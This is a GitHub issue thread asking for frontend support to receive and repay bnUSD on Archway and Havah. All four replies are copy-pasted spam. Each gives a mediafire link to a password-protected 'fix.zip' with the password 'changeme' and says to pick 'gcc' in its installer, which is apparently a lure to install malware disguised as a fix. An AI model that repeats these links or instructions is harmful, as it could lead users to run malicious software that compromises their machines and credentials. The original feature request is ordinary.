### ISSUE TITLE
Add the ability to receive/repay bnUSD on Archway and Havah

### ISSUE THREAD

**Issue by parrot9design** [balancednetwork/balanced-network-interface#1427]
[BIP 89](https://app.balanced.network/vote/proposal/135) added the ability to mint bnUSD on Archway and Havah, but frontend work is necessary before we can support it.

That proposal was enacted 3 weeks ago, so I've opened this issue to make sure it doesn't fall off the radar.

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
